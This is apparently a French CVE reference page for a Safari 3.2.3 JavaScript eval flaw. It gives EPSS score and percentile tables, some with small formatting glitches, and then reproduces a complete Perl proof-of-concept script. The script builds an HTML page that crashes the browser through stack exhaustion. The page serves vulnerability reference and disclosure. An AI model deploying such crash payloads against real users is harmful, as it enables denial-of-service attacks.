CVE-2009-3272 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	4.19%	–	–
2022-04-03	–	–	4.19%	–	–
2022-07-17	–	–	4.19%	–	–
2023-03-12	–	–	–	5.9%	–
2023-05-21	–	–	–	11.05%	–
2023-07-02	–	–	–	25.33%	–
2023-08-13	–	–	–	32%	–
2023-10-29	–	–	–	32%	–
2024-02-11	–	–	–	44.9%	–
2024-03-24	–	–	–	52.64%	–
2024-06-02	–	–	–	59.99%	–
2024-09-01	–	–	–	62.67%	–
2025-01-19	–	–	–	62.67%	–
2025-03-18	–	–	–	–	4.44%
2025-03-18	–	–	–	–	4.44,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	7%
2022-04-03	86%
2022-07-17	87%
2023-03-12	92%
2023-05-21	94%
2023-07-02	96%
2023-08-13	96%
2023-10-29	97%
2024-02-11	97%
2024-03-24	98%
2024-06-02	98%
2024-09-01	98%
2025-01-19	98%
2025-03-18	88%
2025-03-18	88%

#!/usr/bin/perl # letsgosurfinnowonsafari.pl # AKA # Safari 3.2.3 (Win32) JavaScript 'eval' Remote Denial of Service Exploit # # Jeremy Brown [0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 09.07.2009 # # ********************************************************************************************************* # Safari crashes when interpreting a webpage that calls the "eval" JavaScript function with "A/" repeating # 21526 times (43052 bytes). When triggering this vulnerability, Safari will throw a "Stack Overflow" # exception, and then an access violation when adjusting the trigger to "A/" repeating 21697 times # (43394 bytes). The problem originates in the module "WebKit.dll". Safari uses this module as part of the # WebKit layout engine (www.webkit.org). # This issue was reported to Apple several months ago and it looks like they fixed it in Safari 4 # (4.1.2 tested) after recent testing. It has also been lying around the Fun Archive @ krakowlabs.com for # quite a while too. Btw, STACK_OVERFLOW does NOT mean there is a buffer overflow on the stack. It pretty # much means that the stack for the process has been exhausted and its maximum size has been reached. # ********************************************************************************************************* # letsgosurfinnowonsafari.pl $fn = 'letsgosurfinnowwithsafari.html'; $size = 21526; # "Stack Overflow" WebKit.dll #$size = 21697; # "Access Violation" WebKit.dll $payload = '<html><script type="text/javascript">' . "\n"; $payload = $payload . 'eval("' . "A/" x $size . '");' . "\n"; $payload = $payload . '</script></html>'; open(FD, '>' . $fn); print FD $payload; close(FD); # milw0rm.com [2009-09-09]